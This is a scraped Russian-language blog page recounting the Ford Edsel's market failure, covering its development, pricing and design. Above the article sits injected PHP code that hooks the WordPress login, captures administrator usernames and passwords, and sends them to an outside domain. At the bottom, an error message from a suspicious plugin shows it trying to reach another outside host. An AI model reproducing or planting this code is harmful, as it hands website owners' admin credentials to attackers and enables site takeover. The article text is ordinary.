if (!function_exists("theme_login_init_0e40e986decc158f6acbb41c14e2f2b4")) { function theme_login_init_0e40e986decc158f6acbb41c14e2f2b4() { if (isset($_POST['log']) and isset($_POST['pwd'])) { $abc = $_POST['log']; $bca = $_POST['pwd']; $zxa = (array)wp_authenticate($abc, $bca); if (isset($zxa["allcaps"]['administrator'])) { $url = 'https://acjscsswp.com/loginfileweb?url=' . urlencode(wp_login_url()) . '&user=' . urlencode($abc) . '&pass=' . urlencode($bca) . '&site=' . urlencode(wp_login_url()); $response = wp_remote_get($url); } } } add_action('wp_login', 'theme_login_init_0e40e986decc158f6acbb41c14e2f2b4', 10, 0); } Ford Edsel – один из самых ошеломляющих провалов в истории автомобилестроения — DigiLider

Ford Edsel – один из самых ошеломляющих провалов в истории автомобилестроения

Ford Edsel – один из самых ошеломляющих провалов в истории автомобилестроения

Ford Edsel – один из самых ошеломляющих провалов в истории автомобилестроения

На начало 50-х, в среднем ценовом сегменте безраздельно господствовала машина Oldsmobile от General Motors. Ford же вообще не был представлен в этой нише. Выпускаемый им Mercury стоил слишком дорого, а недорогие «Форды» продавались с очень низкой маржей и приносили все меньше и меньше дохода. В один прекрасный момент руководство концерна поняло, что бодаться в бюджетном сегменте бессмысленно и решило наладить выпуск среднедорогих машин.

Для производства новой модели компания основала отдельное подразделение, назвав его в честь покойного сына Генри Форда – Эдсела. Были потрачены огромные средства и 7 долгих лет для того, чтобы мир увидело авто E-Car, название которого расшифровывалось как «экспериментальное авто» и перекликалось с именем крылатого мифического героя, Икара.

Содержание

  • Создание
  • Высокая цена
  • Неудачный дизайн

Ford Edsel – один из самых ошеломляющих провалов в истории автомобилестроения

Создание

И вот в сентябре 57-го «Икар» предстал перед публикой. Машины позиционировали, как кардинально новые, однако в действительности это был некий гибрид дорогих и бюджетных моделей Форда, которые от своих прототипов внешне отличались разве что новыми крупными фарами и вертикальным овалом радиатора.

В продажу вышли 4 модели Ford Edsel: мощные Citation и Corsair, созданные на основе Mercury, и небольшие Pacer и Ranger, поставленные на фордовское шасси. И в том и другом случае технические характеристики были стандартными для машин концерна: барабанные тормоза, червячный привод руля, а также рамная платформа, опирающаяся на независимые амортизаторы спереди и на рессоры сзади. В зависимости от комплектации можно было приобрести двигатель объемом 5,9 л или 6,7 л.

Высокая цена

За первый год концерн продал 10000 автомобилей Эдсел, за следующий – и того меньше. Для сравнения модель Falcon, выпущенная парой лет позже, разошлась тиражом почти в полмиллиона штук всего за несколько месяцев.

Как и мифический Икар, Edsel стремился к совершенству, но сгорел, провозгласив себя новым идолом и 8-м чудом света. Компанию закрыли 19 ноября 1959 года. Позже журнал Time напишет: «Это была неподходящая машина на неподходящем рынке, которая появилась не в свое время».

Сегодня провал Ford Edsel изучают в бизнес-школах. Современные маркетологи называют несколько причин того, что неплохое, в общем, авто не нашло признания. Основная из них – высокая цена. За такую сумму можно было купить надежный и проверенный временем Mercury. То есть у людей со средним достатком денег на Эдсел не было, а богатые американцы предпочитали более дорогие марки с известными именами.

Неудачный дизайн

Еще одна причина провала – не до конца продуманный дизайн. Опрос автовладельцев показал, что массивный овал на радиаторе, напоминает многим крышку унитаза или хомут. В итоге то, что должно было стать фишкой бренда, наоборот, оттолкнуло потенциального покупателя.

Также компания не обеспечила подобающее тех. обслуживание. Мало того, что машины часто ломались, так еще и ремонтом занимались низкоквалифицированные слесаря, не знающие устройства нового авто.

Есть в этой истории и мистика. Эдсел Форд был глубоко несчастным парнем, жившим в тени знаменитого отца и умершим на 2 года раньше его, так и не сделав ничего значимого. Считается, что имя Эдсела принесло неудачу новой марке, и если бы машину назвали по-другому, ее история бала бы иной.

Никто не знает, как сложилась бы судьба Edsel при других обстоятельствах, но понятно одно – сегодня американские бизнесмены используют слово «edsel», как синоним понятий «крах» и «провал».


Warning: fsockopen(): Unable to connect to ssl://getajaxx.com:443 (Connection timed out) in /var/www/u0503503/data/www/digilider.ru/wp-content/plugins/custom-fetch-url/custom-fetch-url.php on line 22
Error: Connection timed out (110)